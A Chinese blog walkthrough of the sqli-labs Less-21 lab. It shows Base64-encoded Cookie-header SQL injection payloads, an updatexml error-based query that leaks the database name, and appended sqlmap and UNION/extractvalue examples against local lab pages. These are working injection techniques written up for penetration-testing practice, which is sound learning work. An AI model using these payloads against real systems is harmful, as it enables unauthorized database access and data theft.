sqli-labs/less-21;header头注入;burpsuite抓包;mysql注入;

本文详细讲述了如何通过Burpsuite抓包,利用Base64编码实现Cookie头注入,进而进行SQL注入攻击。作者展示了从发现编码方式到利用updatexml函数暴漏数据库的过程,适合学习渗透测试和安全防护的读者。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、输入正确账号登陆

 

 

2、这里使用burpsuite进行抓包

 3、这里使用打算使用cookie头注入,因为它页面有cookie回显;

看到uname编码方式中有%感觉有点像url;

 

发现是base64编码

 

这里选择base64编码; 

 

 

 

4、这里闭合失败

发现提示要使用   ')   进行闭合;

    

5、这里使用base64编码: 

admin') and 1=1 -- +

YWRtaW4nKSBhbmQgMT0xIC0tICs=

 

 闭合成功

6、查一下数据库

这里利用报错查询:updatexml

admin') and updatexml(1,concat(0x7e,database(),0x7e),1) -- +

YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSAtLSAr

 

 

7、后面表名字段数据就随便爆了,如果不知道,可以看我之前的文章;

### sqli-labs 手工注入命令 对于SQL注入实验环境 `sqli-labs` 中的手工注入操作,可以通过构造特定的URL参数来实现。下面展示如何针对不同场景执行手工注入。 #### 字符型盲注实例 当面对字符型输入框时,可以尝试使用布尔盲注技术验证是否存在漏洞: ```sql http://127.0.0.1/sqli-labs-master/Less-7/?id=1') AND '1'='1'%23 ``` 此语句利用了闭合单引号并附加了一个永远成立的条件 `'1'='1'` 来测试服务器响应是否正常[^4]。 #### 使用UNION SELECT进行数据提取 为了读取当前使用的数据库名称或其他敏感信息,可采用如下方式构建查询字符串: ```sql http://127.0.0.1/sqli-labs-master/Less-5/?id=1' UNION SELECT extractvalue(1,concat('~','~',database())) -- a ``` 这条指令通过联合查询的方式试图获取数据库名,并将其作为结果集的一部分返回给客户端显示出来[^1]。 #### POST请求中的SQL注入 如果目标应用程序接受POST方法提交的数据,则需要调整攻击向量以适应这种交互模式。此时可以借助工具如Burp Suite抓包修改表单字段值来进行注入尝试;也可以直接运用自动化工具完成这一过程: ```bash sqlmap -u "http://localhost/sqli-labs/Less-15/" --batch --data "uname=admin&passwd=admin&submit=Submit" --dbs ``` 上述命令指定了登录界面所需的用户名密码等参数并通过`--data`选项传递给了sqlmap用于后续分析处理[^2]。 请注意,在实际环境中实施任何类型的渗透测试之前都应获得合法授权,未经授权擅自访问他人计算机信息系统属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值